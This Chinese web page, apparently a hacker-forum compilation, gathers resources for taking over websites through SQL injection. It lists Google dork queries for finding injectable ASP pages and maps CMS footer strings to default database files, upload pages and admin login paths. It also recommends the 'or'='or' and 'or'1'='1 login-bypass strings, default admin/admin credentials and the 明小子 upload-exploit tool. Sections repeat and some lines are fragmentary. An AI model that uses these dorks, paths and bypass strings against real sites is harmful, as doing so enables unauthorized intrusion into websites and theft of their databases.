常用的SQL注入关键字
inurl:asp
目标关键字+inurl:id
英语字母及单词+inurl:id
网站域名+inurl:id
阿拉伯数字+inurl:id
inurl:asp?id=
inurl:Article_Print.asp?
EnCompHonorBig.asp?id=随便加个数字
showproduct.asp?id=随便加个数字
inurl:ManageLogin.asp
EnCompHonorBig.asp?id= 随便加个数字
inurl: (asp?=数字) inurl: (php?=数字)
inurl:Article_Print.asp?
site 指定网站 inurl:Article_Print.asp?
NewsInfo.asp?id=
ShowNew.asp?Id=
ShowNews.asp?Id=
Show.asp?Id=
注入拿站关键字整理(超全)
关键字:Power WenDay Ver1.0
添加: /db/PW_SYS_Data.mdb
关键字:powered by WEBBOY
添加: /upfile.asp
关键字:Powered By :SMT Version 5.0
添加: /bbs/upfile.asp /upfile_flash.asp
关键字:team5 studio all rights reserved
添加: /data/team.mdb
关键字:传奇私服
添加: /msmirdata/msmirArticle.mdb(默认数据库)
后台管理地址:http;//您的域名/msmiradmin/
关键字:同城约会 贺卡传情 情感随笔 热门投票
添加: /admin/upload_file.asp (明小子上传)
关键字: 公司后台
添加: /manage/Login.asp (用"or"="or")
关键字:企业邮局 企业荣誉 营销网络 产品分类 信息反馈
收藏本站 网站管理
添加: /admin/login.asp (后台管理地址,管理员帐号密码
=admin)
关键字:
添加:/data/scadata.mdzhaozhon
关键字: Power System Of Article Management Ver 3.0
Build 20030628
添加: /database\yiuwekdsodksldfslwifds.mdb (后台的后
缀全是/admin_index.asp)
关键字: Foosun
添加: /Foosun_Data/FS400.mdbAdmin/login.asp (后台的后
缀全是admin/login.asp)
关键字:Powered By Kesion Inc
默认数据库 ks_data/ks_database.mdb
关键字: (啊拉)
(极限居)
< (QQ冲击波)
(完美)
1、如在网站中到诸如:“请登录后再使用本功能!”这样
的就可以用明小子上传试试
2、使用明小子上传时选择“动力上传漏
洞—/upfile_softpic.asp页面”
明小子关键词:
1.ProductShow.asp?ArticleID=
2.inurl:show_news.asp?id=
3.site inurl:Article_Print.asp
9.4.edit.asp?
5.site:cq inurl:asp
6.intitle:网站小助手
7.powered by comersus ASP shopping cart
open source
8./skins/default/
9.动力上传系统
10.oioj's blog
11.动网: ReloadForumCache.asp
12."intext:Discuz! 4.1.0"
13.尚奈克斯
14.Team5 Studio All rights reserved
15.XXX inurl:Nclass.asp
16.Powered by:QCDN_NEWS
17.发布系统
18.asp?id=1
19.Powered by:94KKBBS 2005
20.inurl:readnews.asp
21.程序核心
经典的用户名密码
asp网站页面'or'='or'
'or'1'='1
这2个密码在很多网站后台,QQ空间相册都可以登陆,不过不是
100%而已....
inurl: 用于搜索网页上包含的URL. 这个语法对寻网页上
的搜索,帮助之类的很有用.
intext: 只搜索网页<body>部分中包含的文字(也就是忽略了
标题,URL等的文字).
site: 可以限制你搜索范围的域名.
filetype: 搜索文件的后缀或者扩展名
intitle: 限制你搜索的网页标题.
allintitle: 搜索所有关键字构成标题的网页. 但是推荐不
要使用
link: 可以得到一个所有包含了某个指定URL的页面列表. 例
如le 就可以得到所有连接到Google的页
面
=====================================================
==============================
intext:管理
filetype:mdb
inurl:file
site:xx filetype:txt 查TXT文件 其他的依次内推
site:xx intext:管理
site:xx inurl:login
site:xx intitle:后台
查看服务器使用的程序
site:xx filetype:asp
site:xx filetype:php
site:xx filetype:jsp
查看上传漏洞:
site:xx inurl:file
site:xx inurl:load
查注射点:
site:xx filetype:asp
site:tw inurl:asp?id= 这个是台湾的
或
site:jp inurl:asp?id= 这个是日本的
或
site:ko inurl:asp?id= 这个是韩国的
依次类推
1、如在网站中到诸如:“请登录后再使用本功能!”这样
的就可以用明小子上传试试
2、使用明小子上传时选择“动力上传漏
洞—/upfile_softpic.asp页面”
pwd.asp
<
123.asp
<
<
qqhao.asp
qqmima.asp
<
<
qq.asp
关键字就要自己想些独特一点的 如果都去扫那些什么 免费
QB 什么的 那都是别人扫剩下的 你拿来也没用 记得一定要
独特 比如收号 信箱 等等 充分发挥你的想象空间
关键字:Power WenDay Ver1.0
添加: /db/PW_SYS_Data.mdb
关键字:powered by WEBBOY
添加: /upfile.asp
关键字:Powered By :SMT Version 5.0
添加: /bbs/upfile.asp /upfile_flash.asp
关键字:team5 studio all rights reserved
添加: /data/team.mdb
关键字:传奇私服
添加: /msmirdata/msmirArticle.mdb(默认数据库)
后台管理
地址:http;//您的域名/msmiradmin/
关键字:同城约会 贺卡传情 情感随笔 热门投票
添加: /admin/upload_file.asp (明小子上传)
关键字: 公司后台
添加: /manage/Login.asp (用"or"="or")
关键字:企业邮局 企业荣誉 营销网络 产品分类 信息反馈
收藏本站 网站管理
添加: /admin/login.asp (后台管理地址,管理员帐号密码
=admin)
关键字:by wygk
添加:/data/scadata.mdb
关键字: Power System Of Article Management Ver 3.0
Build 20030628
添加: /database\yiuwekdsodksldfslwifds.mdb (后台的后
缀全是/admin_index.asp)
关键字: Foosun
添加: /Foosun_Data/FS400.mdbAdmin/login.asp (后台的后
缀全是admin/login.asp)
关键字:Powered By Kesion Inc
默认数据库 ks_data/ks_database.mdb
关键字: (啊拉)
(极限居)
< (QQ冲击波)
(完美)
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论